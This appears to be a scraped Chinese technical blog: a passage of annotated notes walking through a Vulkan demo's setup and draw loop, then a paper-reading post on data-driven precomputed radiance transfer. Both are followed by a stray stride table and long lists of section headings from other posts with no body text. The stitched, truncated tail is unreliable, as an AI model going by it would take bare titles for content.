- vkBindImageMemory 将分配的 VkDeviceMemory 绑定到 VkImage
- demo_set_image_layout
  - 如果 demo->setup_cmd 为空，则
    - 调用 vkAllocateCommandBuffers 从 demo->cmd_pool 中分配 VK_COMMAND_BUFFER_LEVEL_PRIMARY 的 Buffer
    - vkBeginCommandBuffer
  - 准备 Image Memory Barrier
    - VkImageMemoryBarrier
      - .srcAccessMask = 0
        
        不需要给 src stage 的任何读/写操作 made coherent
      - .dstAccessMask:
        
        对于 VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL，设置为 VK_ACCESS_DEPTH_STENCIL_ATTACHMENT_WRITE_BIT
      - .oldLayout = VK_IMAGE_LAYOUT_UNDEFINED，也就是垃圾数据
      - .newLayout = VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL
  - 录制 Pipeline Barrier
    - vkCmdPipelineBarrier
      - srcStageMask = VK_PIPELINE_STAGE_TOP_OF_PIPE_BIT，也就是 wait for nothing
      - dstStageMask = VK_PIPELINE_STAGE_TOP_OF_PIPE_BIT，也就是任何下面的指令在开始前都需要等待 Barrier 执行完
      - 同时传入前面的 Image Mmeory Barrier
- vkCreateImageView 创建深度缓冲对应图像的 ImageView
demo_prepare_textures
- vkGetPhysicalDeviceFormatProperties 获得 VK_FORMAT_B8G8R8A8_UNORM 的 VkFormatProperties
- 对于每张 texture
  用 texture_object 来管理每个 texture
  - VkSampler sampler
  - VkImage iamge;
  - VkImageLayout imageLayout;
  - VkDeviceMemory mem;
  - VkImageView view;
  - int32_t tex_width, tex_height;
  - 如果 sampler 支持（对此种 format 的）线性分块 (props.linearTilingFeatures & VK_FORMAT_FEATURE_SAMPLED_IMAGE_BIT)
    - demo_prepare_texture_image with required_props = VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT | VK_MEMORY_PROPERTY_HOST_COHERENT_BIT
      - vkCreateImage
      - vkGetImageMemoryRequirements
      - memory_type_from_properties
        
        对设备支持的每种内存类型，枚举其是否符合前面 required_props 的要求
      - vkAllocateMemory
      - vkBindImageMemory
      - 如果 memory type 有性质 VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT
        
        vkGetImageSubresourceLayout
        
        vkMapMemory: 映射到地址空间
        
        填充之
        
        vkUnmapMemory
      - 设置 image layout (前面分析过)
        
        VK_IMAGE_LAYOUT_PREINITIALIZED -> VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL
        
        demo_set_image_layout
  - 如果 sampler 不支持对此种 format 的线性分块，但支持 optimal 分块 (props.optimalTilingFeatures & VK_FORMAT_FEATURE_SAMPLED_IMAGE_BIT)
    - 分别准备 host coherent 和 host visible 的 staging texture 和 GPU device local 的 texture
      - demo_prepare_texture_image * 2
        
        这里 device local 的显然没能力初始化
      - 注意 memory props
    - 改 layout 以便使用 transfer 命令
      - staging texture: VK_IMAGE_LAYOUT_TRANSFER_SRC_OPTIMAL
      - device local texture: VK_IMAGE_LAYOUT_TRANSFER_DST_OPTIMAL
    - vkCmdCopyImage
    - 将 device local texture 的 layout 改回来
      - demo_set_image_layout
    - demo_flush_init_cmd: 同步方式 flush setup cmd
      - vkEndCommandBuffer
      - vkQueueSubmit
        
        no wait / signal semaphores
      - vkQueueWaitIdle
      - vkFreeCommandBuffers
      - demo->setup_cmd = VK_NULL_HANDLE
    - demo_destroy_texture_image 销毁 staging texture
  - 创建对应的 sampler 和 Image View
    - vkCreateSampler
    - vkCreateImageView
demo_prepare_vertices

这里直接用了 Host visible & Host coherent 的 memory 作为 vertex buffer
而不是 Device local 的，然后单开 staging buffer 做拷贝.

应该是偷懒了.jpg
- vkCreateBuffer
  - with .usage = VK_BUFFER_USAGE_VERTEX_BUFFER_BIT
- vkGetBufferMemoryRequirements
- memory_type_from_properties
- vkAllocateMemory
- vkMapMemory
- vkUnmapMemory
- vkBindBufferMemory
- 配置一些结构体
  - VkPipelineVertexInputStateCreateInfo
    - VkVertexInputBindingDescription
    - VkVertexInputAttributeDescription

demo_prepare_descriptor_layout

vkCreateDescriptorSetLayout

VkDescriptorSetLayoutCreateInfo

.pBindings = &layout_binding

layout_binding: 设置每个 binding 的位置都放什么 - 可以为数组

const VkDescriptorSetLayoutBinding layout_binding = {
  .binding = 0,
  .descriptorType = VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER,
  .descriptorCount = DEMO_TEXTURE_COUNT,
  .stageFlags = VK_SHADER_STAGE_FRAGMENT_BIT,
  .pImmutableSamplers = NULL,
};

vkCreatePipelineLayout
- VkPipelineLayoutCreateInfo: demo->pipeline_layout
  - 指定了到 Descriptor Set Layouts 的数量和数组指针

demo_prepare_render_pass
- vkCreateRenderPass
  - VkRenderPassCreateInfo
    - .pAttachments: VkAttachmentDescription
      - [0]: Color Attachment
        
        .samples = VK_SAMPLE_COUNT_1_BIT 图像的 sample 数
        
        .loadOp = VK_ATTACHMENT_LOAD_OP_CLEAR color & depth 内容在 subpass 开始时如何处理
        
        .storeOp = VK_ATTACHMENT_STORE_OP_STORE color & depth 内容在 subpass 结束后如何处理
        
        .stencilLoadOp = VK_ATTACHMENT_LOAD_OP_DONT_CARE stencil 内容在 subpass 开始时如何处理
        
        .stencilStoreOp = VK_ATTACHMENT_STORE_OP_DONT_CARE stencil 内容在 subpass 结束时如何处理
        
        .initialLayout = VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL subpass 开始前 image subresource 的 layout
        
        .finalLayout = VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL subpass 结束后 image subresource 将会被自动转换到的 layout
      - [1]: Depth Stencil Attachment
        
        .format = demo->depth.format
        
        .samples = VK_SAMPLE_COUNT_1_BIT
        
        .loadOp = VK_ATTACHMENT_LOAD_OP_CLEAR
        
        .storeOp = VK_ATTACHMENT_STORE_OP_DONT_CARE
        
        .stencilLoadOp = VK_ATTACHMENT_LOAD_OP_DONT_CARE
        
        .stencilStoreOp = VK_ATTACHMENT_STORE_OP_DONT_CARE
        
        .initialLayout = VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL
        
        .finalLayout = VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL
    - .pSubpasses: VkSubpassDescription
      
      A single render pass can consist of multiple subpasses. Subpasses are subsequent rendering operations that depend on the contents of framebuffers in previous passes, for example a sequence of post-processing effects that are applied one after another. If you group these rendering operations into one render pass, then Vulkan is able to reorder the operations and conserve memory bandwidth for possibly better performance. Render passes - Vulkan Tutorial
      - .pipelineBindPoint = VK_PIPELINE_BIND_POINT_GRAPHICS 该 subpass 支持的 pipeline 类型
      - .pInputAttachments = NULL
      - .pColorAttachments = &color_reference
        
        VkAttachmentReference {.attachment = 0, .layout = VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL}
        引用到上面的 [0]
      - .pDepthStencilAttachment = &depth_reference
        
        VkAttachmentReference {.attachment = 1, .layout = VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL}
        引用到上面的 [1]
    - .pDependencies: VkSubpassDependency 有多个 subpass 时指定 subpass 间的读写依赖关系
      
      和 vkCmdPipelineBarrier + VkMemoryBarrier 差不多，区别只是同步作用域限于指定的 subpass 间，而非所有在前在后的操作 (Vulkan Spec)
demo_prepare_pipeline
- vkCreatePipelineCache: (optional for pipeline creation)
  
  主要用来供实现缓存编译好的 Pipeline; 可以使用 allocator 限制其缓存数据的大小; 可以创建时导入之前 (应用程序) 的 Cache 等
- vkCreateGraphicsPipelines
  - VkGraphicsPipelineCreateInfo
    - .layout = demo->pipeline_layout
    - .pVertexInputState: VkPipelineVertexInputStateCreateInfo
      - 已经在 demo_prepare_vertices 中准备好
    - .pInputAssemblyState: VkPipelineInputAssemblyStateCreateInfo
      - .topology = VK_PRIMITIVE_TOPOLOGY_TRIANGLE_LIST
    - .pRasterizationState: VkPipelineRasterizationStateCreateInfo
      - .polygonMode = VK_POLYGON_MODE_FILL
      - .cullMode = VK_CULL_MODE_BACK_BIT
      - .frontFace = VK_FRONT_FACE_CLOCKWISE
        
        front-facing triangle orientation to be used for culling
      - .depthClampEnable = VK_FALSE
        
        不启用深度截断
      - .rasterizerDiscardEnable = VK_FALSE
        
        是否在光栅化阶段前立即丢弃片元
      - .depthBiasEnable = VK_FALSE
      - .lineWidth = 1.0f
        
        光栅化线段宽度
    - .pColorBlendState: VkPipelineColorBlendStateCreateInfo
      - .pAttachments: VkPipelineColorBlendAttachmentState，对每个 color attachment 定义 blend state
        
        [0]
        
        .colorWriteMask = 0xf
        
        写入 RGBA 全部四个通道 (Vulkan Spec)
        
        .blendEnable = VK_FALSE
        
        不启用 Blending，直接写入
    - .pMultisampleState: VkPipelineMultisampleStateCreateInfo
      - .rasterizationSamples = VK_SAMPLE_COUNT_1_BIT
      - .pSampleMask = NULL
    - .pViewportState: VkPipelineViewportStateCreateInfo
      - .viewportCount = 1
      - .scissorCount = 1
      - 不过这里用的 Dynamic State，也就是 Viewport 和 Scissor 的信息是在录制 Command Buffer 时提供的，创建 Pipeline 时不提供
        
        详情看 .pDynamicState
    - .pDepthStencilState: VkPipelineDepthStencilStateCreateInfo
      - .depthTestEnable = VK_TRUE
      - .depthWriteEnable = VK_TRUE
      - .depthCompareOp = VK_COMPARE_OP_LESS_OR_EQUAL
      - .depthBoundsTestEnable = VK_FALSE
        
        Samples coverage = 0 if outside the bound predetermined
        
        28.8. Depth Bounds Test
      - .stencilTestEnable = VK_FALSE 下面都是 Stencil test 的参数
      - .back.failOp = VK_STENCIL_OP_KEEP
      - .back.passOp = VK_STENCIL_OP_KEEP
      - .back.compareOp = VK_COMPARE_OP_ALWAYS
      - .front = ds.back
    - .pStages: VkPipelineShaderStageCreateInfo
      - [0]
        
        .stage = VK_SHADER_STAGE_VERTEX_BIT
        
        .pName = "main"
        
        .module = demo_prepare_vs(demo)
        
        Call demo_prepare_shader_module with vert SPIR-V code
        
        vkCreateShaderModule with size_t codeSize & uint32_t *pCode
      - [1]
        
        .stage = VK_SHADER_STAGE_FRAGMENT_BIT
        
        .pName = "main"
        
        .module = demo_prepare_fs(demo)
        
        Similar with above
    - .pDynamicState: VkPipelineDynamicStateCreateInfo
      - .pDynamicStates = dynamicStateEnables
        
        启用了 VK_DYNAMIC_STATE_VIEWPORT 和 VK_DYNAMIC_STATE_SCISSOR
    - .renderPass: VkRenderPass
      传入之前创建的 VkRenderPass
- vkDestroyPipelineCache
- vkDestroyShaderModule * 2
  - 删除 vs 和 fs 的两个刚才创建的 Shader Module (demo_prepare_vs / demo_prepare_fs)
demo_prepare_descriptor_pool
- vkCreateDescriptorPool
  - VkDescriptorPoolCreateInfo
    - .pPoolSizes = &type_count
      - VkDescriptorPoolSize
        
        .type = VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER
        
        .descriptorCount = DEMO_TEXTURE_COUNT
demo_prepare_descriptor_set
- vkAllocateDescriptorSets：按 Descriptor Set Layouts 从 Descriptor Pool 中分配 Descriptor Sets
  - .pSetLayouts = &demo->desc_layout
  - .descriptorPool = demo->desc_pool
- vkUpdateDescriptorSets
  支持 Write 和 Copy 两种形式的 Descriptor Set 更新请求
  - VkWriteSescriptorSet
    - .dstSet = demo->desc_set 刚分配的 Descriptor Set
    - .descriptorCount = DEMO_TEXTURE_COUNT
    - .descriptorType = VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER
    - .pImageInfo = tex_descs
      - VkDescriptorImageInfo: 具体的 Descriptor 内容
        
        .sampler = demo->textures[i].sampler
        
        .imageView = demo->textures[i].view
        
        .imageLayout = VK_IMAGE_LAYOUT_GENERAL
        
        感觉这里应该是选对应的才对，不知道这样可以不可以
demo_prepare_framebuffers
- 创建 demo->swapchainImageCount 个 VkFramebuffer
  - vkCreateFramebuffer
    - VkFramebufferCreateInfo
      - .renderPass = demo->renderpass
      - .pAttachments: VkImageView[]
        
        [0]: Color Attachment, demo->buffers[i].view
        
        That is, the swapchain image view
        
        [1]: Depth Attachment
        
        demo->depth.view
      - .width, .height
      - .layers = 1
        
        正如 VkImage 创建时也可以选择多 layer 一样，这里也可以；不过 Shader 默认写入第一层，除了 Geometry Shader
        
        多 layer 的 Image / Framebuffer 在 Shader 里面是用的 texture array 的语法来访问的

demo_run
- glfwWindowShouldClose: 检测窗口的 closing 标志
- glfwPollEvent
- demo_draw
  - vkCreateSemaphore: imageAcquiredSemaphore
  - vkCreateSemaphore: drawCompleteSemaphore
  - vkAcquireNextImageKHR
    
    这里有一个问题，这里返回并不意味着 Present 完成 (推荐做法是 Present 设置 Semaphore，然后等 Semaphore)
    
    那么，什么情况下这里会 block？
    也可以参考 Let’s get swapchain’s image count straight - StackOverflow
    - timeout = UINT64_MAX
    - semaphore = imageAcquiredSemaphore
    - pImageIndex = &demo->current_buffer: index of the next image to use
      - 完成后会 signal 该 semaphore
    - 返回值
      - VK_ERROR_OUT_OF_DATE_KHR
        
        demo_resize: 处理 resize 情况：Destroy everything
        
        vkDestroyFramebuffer
        
        vkDestroyDescriptorPool
        
        vkFreeCommandBuffers
        
        vkDestroyCommandPool
        
        vkDestroyPipeline
        
        vkDestroyRenderPass
        
        vkDestroyPipelineLayout
        
        vkDestroyDescriptorSetLayout
        
        vkDestroyBuffer (vertex buffer)
        
        vkFreeMemory (vertex buffer memory)
        
        vkDestroyImageView
        
        vkDestroyImage
        
        vkDestroySampler
        
        …
        
        call demo_prepare
        
        demo_draw: 重复调用一下自己
      - VK_SUBOPTIMAL_KHR: 不是最优，但是也能 present，所以不管
  - demo_flush_init_cmd: 同步方式 flush setup cmd
    - vkEndCommandBuffer
    - vkQueueSubmit
      - no wait / signal semaphores
    - vkQueueWaitIdle
    - vkFreeCommandBuffers
    - demo->setup_cmd = VK_NULL_HANDLE
  - demo_draw_build_cmd
    - vkBeginCommandBuffer: demo->draw_cmd
    - vkCmdPipelineBarrier
      - Execution barrier 部分
        
        srcStageMask = VK_PIPELINE_STAGE_ALL_COMMANDS_BIT，也就是 wait for everything
        
        dstStageMask = VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT (Specifies no stage of execution)
        
        VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT is equivalent to VK_PIPELINE_STAGE_ALL_COMMANDS_BIT with VkAccessFlags set to 0 when specified in the first synchronization scope, but specifies no stage of execution when specified in the second scope.
      - Memory barrier 部分: 对 color attachment 做 layout transition
        
        从 VK_IMAGE_LAYOUT_UNDEFINED -> VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL
        
        .dstAccessMask = VK_ACCESS_COLOR_ATTACHMENT_WRITE_BIT
    - vkCmdBeginRenderPass with VK_SUBPASS_CONTENTS_INLINE
      
      VK_SUBPASS_CONTENTS_INLINE specifies that the contents of the subpass will be recorded inline in the primary command buffer, and secondary command buffers must not be executed within the subpass.
      - VkRenderPassBeginInfo
        
        .renderPass
        
        .framebuffer - 选择当前的 framebuffer，我们有 swapchainImageCount 个
        
        .renderArea
        
        .offset.{x, y}
        
        .extent.{width, height}
        
        .pClearValues = clear_values (VkClearValue)
        
        这里是和 RenderPassCreateInfo 指定的 attachments 相对应的
        
        pClearValues is a pointer to an array of clearValueCount VkClearValue structures containing clear values for each attachment, if the attachment uses a loadOp value of VK_ATTACHMENT_LOAD_OP_CLEAR or if the attachment has a depth/stencil format and uses a stencilLoadOp value of VK_ATTACHMENT_LOAD_OP_CLEAR. The array is indexed by attachment number. Only elements corresponding to cleared attachments are used. Other elements of pClearValues are ignored.
        
        [0] = {.color.float32 = {0.2f, 0.2f, 0.2f, 0.2f}}
        
        [1] = {.depthStencil = {demo->depthStencil, 0}}
        
        demo->depthStencil 用来加一个“无形的墙”
    - vkCmdBindPipeline
      - pipelineBindPoint = VK_PIPELINE_BIND_POINT_GRAPHICS
    - vkCmdBindDescriptorSets
      - layout = demo->pipeline_layout
        Recall: Pipeline layout <= Descriptor Set Layouts
      - Descriptor Sets
    - vkCmdSetViewport
      - VkViewport
        
        .height, .width, .minDepth, .maxDepth
    - vkCmdSetScissor
      - VkRect2D
        
        .extent.{width, height}
        
        .offset.{x, y}
    - vkCmdBindVertexBuffers
      
      看 https://github.com/SaschaWillems/Vulkan/blob/master/examples/instancing/instancing.cpp 可能会印象更深刻
      - firstBinding 参数用于 (CPU 端) 指定绑定到哪里
    - vkCmdDraw
      - vertexCount = 3
      - instanceCount = 1
      - firstVertex = 0
      - firstInstance = 0
    - vkCmdEndRenderPass
    - vkCmdPipelineBarrier
      - Execution barrier:
        
        srcStageMask = VK_PIPELINE_STAGE_ALL_COMMANDS_BIT，也就是 wait for everything
        
        dstStageMask = VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT (Specifies no stage of execution)
      - Memory barrier:
        
        正如 transfer，present 也需要 layout 改变
        
        .srcAccessMask = VK_ACCESS_COLOR_ATTACHMENT_WRITE_BIT
        
        .dstAccessMask = VK_ACCESS_MEMORY_READ_BIT
        
        .oldLayout = VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL
        
        .newLayout = VK_IMAGE_LAYOUT_PRESENT_SRC_KHR
    - vkEndCommandBuffer: demo->draw_cmd
  - vkQueueSubmit
    - .pCommandBuffers = &demo->draw_cmd
    - .pWaitSemaphores = &imageAcquiredSemaphore
    - .pWaitDstStageMask = &pipe_stage_flags
      - pWaitDstStageMask is a pointer to an array of pipeline stages at which each corresponding semaphore wait will occur.
      - 这里设置成了 VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT
      - 所以，相当于啥也没等
    - .pSignalSemaphores = &drawCompleteSemaphore
  - vkQueuePresentKHR
    - VkPresentInfoKHR
      - .pWaitSemaphores = &drawCompleteSemaphore
      - .pSwapchains = &demo->swapchain
        
        可以多个，用来支持多个 swapchain 用一个 queue present 操作进行 present
      - .pImageIndices = &demo->current_buffer
    - 返回值
      - VK_ERROR_OUT_OF_DATE_KHR
        
        demo_resize
      - VK_SUBOPTIMAL_KHR
        
        啥事不干
  - vkQueueWaitIdle
  - vkDestroySemaphore: imageAcquiredSemaphore
  - vkDestroySemaphore: drawCompleteSemaphore
- demo->depthStencil 周期改变
- vkDeviceWaitIdle
- 如果到了指定的帧数，则 glfwSetWindowShouldClose
demo_cleanup
- 删除一万个东西 (literally)
- glfwDestroyWindow
- glfwTerminate

论文阅读 | 数据驱动的 PRT 2022-12-18

本文省略了一大堆细节，详情参见论文。

TODO: 整理清楚各个维数，因为原论文也不甚详细；

更新后的版本会放到这里，如果有。

Recap: Precomputed Radiance Transfer

本节主要参考GAMES 202 - 高质量实时渲染课程的 Lecture 6 和 Lecture 7

考虑渲染方程

$$ L({\bf o}) = \int_{\mathcal{H}^2} L({\bf i}) \rho({\bf i}, {\bf o}) V({\bf i}) \max(0, {\bf n} \cdot {\bf i}) d {\bf i} $$

其中

$ {\bf i}, {\bf o} $ 为入射和出射方向
$ L({\bf i}), L({\bf o}) $ 为入射和出射 radiance
- 此处省略了作为参数的 shading point 位置 $ \bf x $，下同
$ \rho $ 为 BRDF 函数
$ V $ 为 Visibility 项

将 $ L({\bf i}) $ 项用级数的有限项进行近似，即

$$ L({\bf i}) \approx \sum_{i=1}^{n} l_i B_i({\bf i}) $$

其中 $ B_i: S^2 \to \mathbb{R} $ 为基函数

带入得到

$$ \begin{aligned} L({\bf o}) &= \int_{\mathcal{H}^2} L({\bf i}) \rho({\bf i}, {\bf o}) V({\bf i}) \max(0, {\bf n} \cdot {\bf i}) d {\bf i} \\ &\approx \sum_i l_i \int_{\mathcal{H}^2} B_i({\bf i}) \rho({\bf i}, {\bf o}) V({\bf i}) \max(0, {\bf n} \cdot {\bf i}) d {\bf i} \\ &= \sum_i l_i T_i({\bf o}) \end{aligned} $$

这里把上面的积分 (“Light transport term”) 记作 $ T_i $.

这里继续进行展开

$$ T_i({\bf o}) \approx \sum_{j=1}^{m} t_{ij} B_j({\bf o}) $$

所以我们得到

$$ \begin{aligned} L({\bf o}) &\approx \sum_i l_i T_i({\bf o}) \\ &\approx \sum_i l_i \left( \sum_j t_{ij} B_j({\bf o}) \right) \\ &\approx \sum_j \left( \sum_i l_i t_{ij} \right) B_j({\bf o}) \\ \end{aligned} $$

也就是说

$$ L({\bf o}) \approx \begin{bmatrix} l_1 & ... & l_n \end{bmatrix} \begin{bmatrix} t_{11} & ... & t_{1m} \\ \vdots & & \vdots \\ t_{n1} & ... & t_{nm} \end{bmatrix} \begin{bmatrix} B_1({\bf o}) \\ \vdots \\ B_m({\bf o}) \end{bmatrix} $$

那么，PRT 的框架就大致如下

预计算
- 对每个可能的 shading point $ {\bf x} $
  - 计算该物体的环境光在基函数下对应的系数 $ l_i $
  - 计算该物体光传输展开系数 $ t_{ij} $
当然，对于 Image based lighting，一般认为 $ L({\bf i}, {\bf x}) \approx L({\bf i}) $，那某些东西就不需要 per-shading point 存储
运行时
- 根据视角 $ {\bf o} $ 和位置 $ {\bf x} $ 来读取对应的向量并计算

对于 Diffuse 物体，$ \rho({\bf i}, {\bf o}) $ 是常数，所以不需要继续展开 $ T_i $ 项

Remarks from paper: PRT methods bake the transport matrix using implicit light sources defined by the illumination basis.
Those light sources shade the asset with positive and negative radiance values. Hence, a dedicated light transport algorithm is used for them.

本文思路

本文的框架只考虑漫反射，虽然结果上对于不是特别 Glossy 的材质应该都可以应用。

框架上的思路就是

间接光 $ L_i({\bf x}; t) $ 和直接光 $ L_d({\bf i}, {\bf x}; t) $ 之间存在线性关系
框架：
- 将 $ {\bf x} $ 和 $ i \times t $ 所在空间分别做一离散化，得到 $ I = MD $
  - 相当于挑了一组基，每个基内部由同一个光照条件下各个位置的 $ L_d $ 组成
- 对于给定的光照条件 $ x $ （各个位置 $ L_d $的值构成的列向量），如何求解 $ L_i $ ？
  - 首先把 $ x $ 分解到该 $ D $ 基下，得到系数向量 $ c = (D^T D)^{-1} D^T x $
  - 每个 $ D $ 基我们都存储有对应的输出，所以结果 $ y = Mx = I(D^T D)^{-1} D^T x $
近似：
- 对 $ I $ 进行 SVD 分解并保留前 $ k $ 项，得到近似矩阵 $ I = U \Sigma V^T \approx U_n \Sigma_n V_n^T $
- $ y \approx U_n (\Sigma_n V_n^T) (D^T D)^{-1} D^T x $
  - let $ M_n = (\Sigma_n V_n^T) (D^T D)^{-1} D^T $
- 存储 $ U_n $ 和 $ M_n $
运行时：
- 用 G-Buffer 得到 $ \mathcal{X}_D $ 空间上的各 $ L_d({\bf i}, {\bf x}; t) $ 的值
- 计算 $ y = U_n M_n x $ 的值

估计光传输矩阵

给定环境光条件 $ t \in \mathcal T $，那么在物体表面 $ {\bf x} $ 处，漫反射光传输方程的形式如下

$$ L_i({\bf x}; t) = \frac{1}{2 \pi}\int_{\mathcal{H}^2} L_d({\bf i}, {\bf x}; t) V({\bf i}, {\bf x}) \max(0, {\bf n} \cdot {\bf i}) d {\bf i} $$

其中，$ L_i({\bf x}; t) $ 被称为间接光， $ L_d({\bf i}, {\bf x}; t) $ 被称为直接光

$ L_d({\bf i}, {\bf x}; t) $ 不考虑环境和物体 inter-reflection; 推导中可以先忽略，虽然实际上对于有 inter-transmission 的情况应该也是可以应用的

现在将 $ {\bf x} $ 和 $ i \times t $ 所在空间分别做一离散化，得到 $ \mathcal{X}_D $ 和 $ \mathcal{T}_D $ 两有限维空间，那么在这两个空间上， $ L_d $ 和 $ L_i $ 都可以表示为矩阵形式，这里规定每一列的元素在同一个环境光条件 $ {\bf i}, t $ 上。

比如说，都在环境光为某点光源照射的情况； $ L_d({\bf i}, {\bf x}; t) $ 的 $ {\bf i} $ 一般意义上是依赖 $ t $ 的

记得到的两个矩阵为 $ D $ 和 $ I $，则

$$ I_k = f(D_k) \quad \forall k \in [0, |\mathcal{T}_D|] $$

从前面可以看到，这里的 $f$ 是线性算子 (是嘛？)，所以

$$ I = MD $$

又假设我们离散 $ \mathcal T $ 空间离散的很好，那么对任意的环境光条件，直接光向量 $ x $ 都可以表示成 $ D $ 的线性组合，满足

$$ x = Dc $$

左右乘 $ M $ 得到

$$ Mx = MDc = Ic $$

也就是说 $x$ 产生的间接光照可以用 $I$ 中列向量的线性组合来表示

因为 $ x = Dc $，假设 $ D^T D $ 可逆，那么用左逆得到

$$ c = (D^T D)^{-1} D^T x $$

那么

$$ y = Mx = Ic = I (D^T D)^{-1} D^T x $$

这样就给出了任意直接光经过光传输的结果

间接光基函数

我们认为，间接光所对应的空间的秩比较低，所以用 SVD 分解然后保留前 $ n $ 项

$$ I = U \Sigma V^T \approx U_n \Sigma_n V_n^T = U_n C_n $$

其中记 $ C_n = \Sigma_n V_n^T $

带回去，得到任意直接光组合经过光传输方程的近似结果

$$ \begin{aligned} y &\approx U_n C_n (D^T D)^{-1} D^T x \\ &\approx U_n M_n x \end{aligned} $$

其中 $ M_n = C_n (D^T D)^{-1} D^T $

直接光编码

如果有需要的话，可以考虑 SH 基函数，详见文章

对比经典 PRT

First, because classical PRT restricts the frequency content of the incoming lighting, we can see that the directional light leaks behind the object. Our method does not restrict the frequency content of incoming light but rather the space of possible indirect illumination. Hence, we can better reproduce such lighting scenario.

Furthermore, classical PRT is performed on the vertices of the asset. This can cause interpolation artifacts when the asset is poorly tessellated, and it also links performance to the vertex count. Since we rely on a meshless approach, we are free of issues.

局限

Sparse Illumination Measurement. As shown in Section 3.3, the sampling of the measurement points is linked to the achievable lighting dimensionality. Thus, it needs to be sufficiently dense to reproduce the space of observable lighting configurations. It follows that a lighting scenario mixing many light types might require a denser sampling.

No Directionality. We reconstruct a diffuse appearance when reconstructing indirect illumination. However, since our method does not depend on the encoding of the measured indirect illumination, it can be extended to reconstruct glossy appearances e.g. directional distributions using directional sampling or any basis such as Spherical Harmonics. However, our method is likely to be restricted to low frequency gloss here and will not work to render specular reflections.

Large Assets. Our solution is not designed to handle assets such as levels in a game. Because we handle light transport globally and reduce it with a handful of basis functions, we cannot reconstruct the interconnected interiors or large environments in which the combinatorics of possible illumination is large. For such case, our method would require to be extended to handle modular transfer between disjoint transport solutions (Similar to Loos et al. [2011]).

Array	Ratio	Local strides	Global strides	Loop stride
a	n/16	{0:1, 1:n}	{0:0, 1:n*16}	16
b	n/16	{0:1, 1:n}	{0:16, 1:0}	16*n

Tailscale 介绍

服务端部署

客户端连接

Windows

Linux

附录：全量服务端配置

./docker-compose.yaml

./Caddyfile

./config/config.yaml

流水账

情况介绍

分析过程

确定哪个进程在发出 DNS 请求

cron 日志暴露的内容

用户账户的信息

日志和文件修改时间

其他异常文件

crontab 分析

功能分析

总结

前言：如何跟踪 Linux 图形栈？

源码阅读

动态跟踪

Vulkan Loader

驱动枚举

驱动入口发现

驱动 Vulkan 对象句柄要求

特例: WSI 扩展

Mesa Vulkan radv

函数派发

vk_common_xxx

杂记

简介

相关实现

QEM Original

Formulation

Framework

Preserving Boundaries

Appearance Preserving QEM

Formulation

Preserving Boundaries

效果展示

简介

See Also

例子

Layout

概观

简单的函数

函数的 in / out 参数

分支

循环

术语

while 循环 - 无 break

while 循环 - 带 break

for 循环

Uniform、BuiltIn 等其它 Scope 的变量

Input / Output

Uniform Block (Anonymous)

Uniform Block (Named)

Sampler

Storage Buffer

Atomic 操作

Coming soon

相关工作

方法总览

Formulation

交替优化

Shader 简化

Mesh 简化

交替优化

分别优化

生成网格变体

生成 Shader 变体

简介

本文的假设和局限性

收集 kernel 统计信息

计算每个特征的预期出现次数

计数粒度 (count granularity)

建模 kernel 执行时间

kernel 特征

`./docker-compose.yaml`

`./Caddyfile`

`./config/config.yaml`

`vk_common_xxx`